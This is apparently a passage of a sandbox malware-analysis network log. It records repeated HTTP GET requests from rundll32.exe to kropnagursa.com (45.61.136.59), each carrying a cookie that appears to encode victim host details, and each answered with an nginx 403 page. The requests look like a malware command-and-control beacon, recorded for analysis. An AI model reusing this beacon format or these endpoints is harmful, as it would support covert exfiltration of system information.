                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:06.368628979 CET2376INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            211192.168.2.44990745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:06.818722010 CET2377OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:06.983654976 CET2378INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            212192.168.2.44990845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:07.304986000 CET2379OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:07.469578028 CET2379INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:07 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            213192.168.2.44990945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:07.820593119 CET2380OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:07.989305973 CET2380INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:07 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            214192.168.2.44991045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:08.571285963 CET2381OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:08.736056089 CET2382INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:08 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            215192.168.2.44991145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:09.046118021 CET2382OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:09.210556030 CET2383INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            216192.168.2.44991245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:09.517637968 CET2384OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:09.685693026 CET2384INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:09 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            217192.168.2.44991345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:10.003372908 CET2385OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:10.168041945 CET2385INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            218192.168.2.44991445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:10.494664907 CET2386OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:10.659394026 CET2387INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            219192.168.2.44991545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:11.209343910 CET2387OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:11.377324104 CET2388INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            22192.168.2.44971845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:12.457989931 CET2135OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:12.623527050 CET2136INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            220192.168.2.44991645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:11.705369949 CET2389OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:11.870371103 CET2389INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:11 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            221192.168.2.44991745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:12.170830011 CET2390OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:12.335808039 CET2390INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            222192.168.2.44991845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:12.659173965 CET2391OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:12.826410055 CET2392INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            223192.168.2.44991945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:13.143441916 CET2392OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:13.308712959 CET2393INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            224192.168.2.44992045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:13.627383947 CET2394OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:13.801183939 CET2394INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:13 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
